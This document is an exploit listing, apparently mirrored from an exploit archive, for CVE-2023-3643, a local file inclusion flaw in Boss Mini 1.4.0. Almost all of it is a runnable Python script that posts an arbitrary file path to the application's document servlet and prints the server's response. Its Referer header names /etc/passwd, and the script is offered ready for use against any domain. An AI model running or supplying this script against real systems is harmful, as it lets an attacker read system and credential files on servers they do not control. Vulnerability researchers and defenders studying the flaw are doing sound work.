Share
## https://sploitus.com/exploit?id=PACKETSTORM:177394
# Exploit Title: Boss Mini 1.4.0 - local file inclusion  
# Date: 07/12/2023  
# Exploit Author: [nltt0] (https://github.com/nltt-br))  
# CVE: CVE-2023-3643  
  
  
'''  
_____ _ _____   
/ __ \ | | / ___|  
| / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--.   
| | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \  
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /  
\____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/   
__/ |   
|___/   
  
'''  
  
from requests import post   
from urllib.parse import quote  
from argparse import ArgumentParser  
  
try:  
parser = ArgumentParser(description='Local file inclusion [Boss Mini]')  
parser.add_argument('--domain', required=True, help='Application domain')  
parser.add_argument('--file', required=True, help='Local file')  
  
args = parser.parse_args()  
host = args.domain  
file = args.file  
url = '{}/boss/servlet/document'.format(host)  
file2 = quote(file, safe='')  
  
headers = {  
'Host': host,  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',  
'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)  
}  
  
  
data = {  
'path': file2  
}  
  
try:  
req = post(url, headers=headers, data=data, verify=False)  
if req.status_code == 200:  
print(req.text)  
  
except Exception as e:  
print('Error in {}'.format(e))   
  
  
except Exception as e:  
print('Error in {}'.format(e))